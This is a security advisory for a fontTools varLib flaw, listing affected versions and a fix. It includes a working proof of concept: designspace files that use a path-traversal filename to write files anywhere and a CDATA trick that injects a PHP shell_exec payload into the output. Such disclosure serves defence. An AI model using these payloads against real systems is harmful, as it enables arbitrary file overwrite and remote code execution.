GHSA-768j-98cg-p3fv

Suggest an improvement
Source
https://github.com/advisories/GHSA-768j-98cg-p3fv
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/12/GHSA-768j-98cg-p3fv/GHSA-768j-98cg-p3fv.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-768j-98cg-p3fv
Aliases
Published
2025-12-01T19:07:00Z
Modified
2025-12-01T19:21:27.883082Z
Severity
  • 6.3 (Medium) CVSS_V3 - CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:L CVSS Calculator
Summary
fontTools is Vulnerable to Arbitrary File Write and XML injection in fontTools.varLib
Details

Summary

The fonttools varLib (or python3 -m fontTools.varLib) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the main() code path of fontTools.varLib, used by the fonttools varLib CLI and any code that invokes fontTools.varLib.main().

The vulnerability exists due to unsanitised filename handling combined with content injection. Attackers can write files to arbitrary filesystem locations via path traversal sequences, and inject malicious code (like PHP) into the output files through XML injection in labelname elements. When these files are placed in web-accessible locations and executed, this achieves remote code execution without requiring any elevated privileges. Once RCE is obtained, attackers can further escalate privileges to compromise system files (like overwriting /etc/passwd).

Overall this allows attackers to: - Write font files to arbitrary locations on the filesystem - Overwrite configuration files - Corrupt application files and dependencies - Obtain remote code execution

The attacker controls the file location, extension and contents which could lead to remote code execution as well as enabling a denial of service through file corruption means.

Affected Lines

fontTools/varLib/__init__.py

filename = vf.filename # Unsanitised filename
output_path = os.path.join(output_dir, filename) # Path traversal
vf.save(output_path) # Arbitrary file write

PoC

  1. Set up malicious.designspace and respective source-*.ttf files in a directory like /Users/<username>/testing/demo/ (will impact relative file location within malicious.designspace)

setup.py

#!/usr/bin/env python3
import os

from fontTools.fontBuilder import FontBuilder
from fontTools.pens.ttGlyphPen import TTGlyphPen

def create_source_font(filename, weight=400):
    fb = FontBuilder(unitsPerEm=1000, isTTF=True)
    fb.setupGlyphOrder([".notdef"])
    fb.setupCharacterMap({})

    pen = TTGlyphPen(None)
    pen.moveTo((0, 0))
    pen.lineTo((500, 0))
    pen.lineTo((500, 500))
    pen.lineTo((0, 500))
    pen.closePath()

    fb.setupGlyf({".notdef": pen.glyph()})
    fb.setupHorizontalMetrics({".notdef": (500, 0)})
    fb.setupHorizontalHeader(ascent=800, descent=-200)
    fb.setupOS2(usWeightClass=weight)
    fb.setupPost()
    fb.setupNameTable({"familyName": "Test", "styleName": f"Weight{weight}"})
    fb.save(filename)

if __name__ == '__main__':
    os.chdir(os.path.dirname(os.path.abspath(__file__)))
    create_source_font("source-light.ttf", weight=100)
    create_source_font("source-regular.ttf", weight=400)

malicious.designspace

<?xml version='1.0' encoding='UTF-8'?>
<designspace format="5.0">
  <axes>
    <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"/>
  </axes>

  <sources>
    <source filename="source-light.ttf" name="Light">
      <location>
        <dimension name="Weight" xvalue="100"/>
      </location>
    </source>
    <source filename="source-regular.ttf" name="Regular">
      <location>
        <dimension name="Weight" xvalue="400"/>
      </location>
    </source>
  </sources>

  <!-- Filename can be arbitrarily set to any path on the filesystem -->
  <variable-fonts>
    &lt;variable-font name="MaliciousFont" filename="../../tmp/newarbitraryfile.json">
      <axis-subsets>
        &lt;axis-subset name="Weight"/>
      </axis-subsets>
    </variable-font>
  </variable-fonts>
</designspace>

Optional: You can put a file with any material within ../../tmp/newarbitraryfile.json in advance, the contents in the file will be overwritten after running the setup script in the following step.

  1. Run the setup.py script to generate source-*.tff files required for the malicious.designspace file.
    python3 setup.py
    
  2. Execute the given payload using the vulnerable varLib saving the file into the arbitrary file location of filename
    fonttools varLib malicious.designspace
    
  3. Validate arbitrary file write was performed by looking at path assigned within malicious designspace
    cat {{filename_location}}
    
  4. After validating that we can provide arbitrary write to any location, we can also validate that we can control sections of content as well demonstrated with the below payload.

malicious2.designspace

<?xml version='1.0' encoding='UTF-8'?>
<designspace format="5.0">
    <axes>
        <!-- XML injection occurs in labelname elements with CDATA sections -->
        <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400">
            <labelname xml:lang="en"><![CDATA[<?php echo shell_exec("/usr/bin/touch /tmp/MEOW123");?>]]]]><![CDATA[>]]></labelname>
            <labelname xml:lang="fr">MEOW2</labelname>
        </axis>
    </axes>
    <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"/>
    <sources>
        <source filename="source-light.ttf" name="Light">
            <location>
                <dimension name="Weight" xvalue="100"/>
            </location>
        </source>
        <source filename="source-regular.ttf" name="Regular">
            <location>
                <dimension name="Weight" xvalue="400"/>
            </location>
        </source>
    </sources>
    <variable-fonts>
        &lt;variable-font name="MyFont" filename="output.ttf">
            <axis-subsets>
                &lt;axis-subset name="Weight"/>
            </axis-subsets>
        </variable-font>
    </variable-fonts>
    <instances>
        <instance name="Display Thin" familyname="MyFont" stylename="Thin">
            <location><dimension name="Weight" xvalue="100"/></location>
            <labelname xml:lang="en">Display Thin</labelname>
        </instance>
    </instances>
</designspace>
  1. When the program is run, we can show we control the contents in the new file

    fonttools varLib malicious2.designspace -o file123
    

    Here being outputted to a localised area ignoring filename presented in variable-font

  2. We can look inside file123 to validate user controlled injection

    cat file123
    

    to show <?php echo shell_exec("/usr/bin/touch /tmp/MEOW123");?>]]>

  3. Executing the file and reading looking at the newly generated file

    php file123
    ls -la /tmp/MEOW123
    

    we can see that the file was just created showing RCE.

Recommendations

  • Ensure output file paths configured within designspace files are restricted to the local directory or consider further security measures to prevent arbitrary file write/overwrite within any directory on the system
Database specific
{
    "nvd_published_at": "2025-11-29T01:16:02Z",
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-01T19:07:00Z",
    "severity": "MODERATE",
    "cwe_ids": [
        "CWE-91"
    ]
}
References

Affected packages

PyPI / fonttools

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
4.33.0
Fixed
4.60.2

Affected versions

4.*

4.33.0
4.33.1
4.33.2
4.33.3
4.34.0
4.34.1
4.34.2
4.34.3
4.34.4
4.35.0
4.36.0
4.37.0
4.37.1
4.37.2
4.37.3
4.37.4
4.38.0
4.38.1.dev0
4.39.0
4.39.1
4.39.2
4.39.3
4.39.4
4.40.0
4.41.0
4.41.1
4.42.0
4.42.1
4.43.0
4.43.1
4.44.0
4.44.1
4.44.3
4.45.0
4.45.1
4.46.0
4.47.0
4.47.2
4.48.1
4.49.0
4.50.0
4.51.0
4.52.1
4.52.3
4.52.4
4.53.0
4.53.1
4.54.0
4.54.1
4.55.0
4.55.1
4.55.2
4.55.3
4.55.4
4.55.5
4.55.6
4.55.7
4.55.8
4.56.0
4.57.0
4.58.0
4.58.1
4.58.2
4.58.3
4.58.4
4.58.5
4.59.0
4.59.1
4.59.2
4.60.0
4.60.1